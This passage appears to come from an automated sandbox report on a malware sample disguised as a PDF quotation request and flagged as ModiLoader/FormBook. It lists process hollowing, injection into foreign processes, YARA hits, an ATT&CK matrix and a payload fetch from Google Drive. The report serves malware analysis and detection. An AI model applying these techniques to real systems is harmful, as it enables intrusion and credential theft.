                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEE016 mov eax, dword ptr fs:[00000030h]6_2_2CDEE016
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66030 mov eax, dword ptr fs:[00000030h]6_2_2CE66030
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54000 mov ecx, dword ptr fs:[00000030h]6_2_2CE54000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72000 mov eax, dword ptr fs:[00000030h]6_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCA020 mov eax, dword ptr fs:[00000030h]6_2_2CDCA020

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: C:\Users\Public\Libraries\kmtqwssC.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: C:\Users\Public\Libraries\kmtqwssC.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: C:\Users\Public\Libraries\kmtqwssC.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and writeJump to behavior
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection unmapped: C:\Users\Public\Libraries\kmtqwssC.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection unmapped: C:\Users\Public\Libraries\kmtqwssC.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection unmapped: C:\Users\Public\Libraries\kmtqwssC.pif base address: 400000Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory written: C:\Users\Public\Libraries\kmtqwssC.pif base: 2AA008Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory written: C:\Users\Public\Libraries\kmtqwssC.pif base: 3DF008Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory written: C:\Users\Public\Libraries\kmtqwssC.pif base: 29B008Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pifJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_02955A78
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: GetLocaleInfoA,1_2_0295A798
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: GetLocaleInfoA,1_2_0295A74C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_02955B84
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02959194 GetLocalTime,1_2_02959194
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295B714 GetVersionExA,1_2_0295B714
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		1
                      Native API                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		11
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Access Token Manipulation                      		1
                      Valid Accounts                      		LSASS Memory321
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading                      		411
                      Process Injection                      		1
                      Access Token Manipulation                      		Security Account Manager2
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		2
                      Virtualization/Sandbox Evasion                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput Capture113
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading                      		411
                      Process Injection                      		LSA Secrets1
                      System Network Connections Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Deobfuscate/Decode Files or Information                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Obfuscated Files or Information                      		DCSync35
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580362 Sample: RTD20241038II Listed Parts ... Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 44 drive.usercontent.google.com 2->44 46 drive.google.com 2->46 56 Found malware configuration 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 Yara detected FormBook 2->60 62 12 other signatures 2->62 8 RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe 1 10 2->8         started        13 Csswqtmk.PIF 5 2->13         started        15 Csswqtmk.PIF 5 2->15         started        signatures3 process4 dnsIp5 48 drive.usercontent.google.com 142.250.181.1, 443, 49707 GOOGLEUS United States 8->48 50 drive.google.com 172.217.19.238, 443, 49704, 49705 GOOGLEUS United States 8->50 36 C:\Users\Public\Libraries\kmtqwssC.pif, PE32 8->36 dropped 38 C:\Users\Public\Libraries\Csswqtmk.PIF, PE32 8->38 dropped 40 C:\Users\Public\Libraries\FX.cmd, DOS 8->40 dropped 42 2 other malicious files 8->42 dropped 64 Writes to foreign memory regions 8->64 66 Allocates memory in foreign processes 8->66 68 Sample uses process hollowing technique 8->68 17 kmtqwssC.pif 8->17         started        20 cmd.exe 1 8->20         started        70 Multi AV Scanner detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 74 Sample is not signed and drops a device driver 13->74 22 kmtqwssC.pif 13->22         started        24 cmd.exe 13->24         started        76 Allocates many large memory junks 15->76 26 kmtqwssC.pif 15->26         started        28 cmd.exe 1 15->28         started        file6 signatures7 process8 signatures9 52 Detected unpacking (changes PE section rights) 17->52 54 Maps a DLL or memory area into another process 17->54 30 conhost.exe 20->30         started        32 conhost.exe 24->32         started        34 conhost.exe 28->34         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe66%ReversingLabsWin32.Trojan.ModiLoader
                      RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Csswqtmk.PIF100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Csswqtmk.PIF66%ReversingLabsWin32.Trojan.ModiLoader
                      C:\Users\Public\Libraries\kmtqwssC.pif3%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.pmail.com00%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      drive.google.com
                      		172.217.19.238
                      		truefalse
                        		high
                        drive.usercontent.google.com
                        		142.250.181.1
                        		truefalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            https://drive.usercontent.google.com/RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000998000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://sectigo.com/CPS0RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.sectigo.com0RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.google.com/RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.sectigo.com0CRTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.pmail.com0RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1400255818.000000007EB7A000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1450771675.0000000021EA0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp, kmtqwssC.pif.1.drfalse
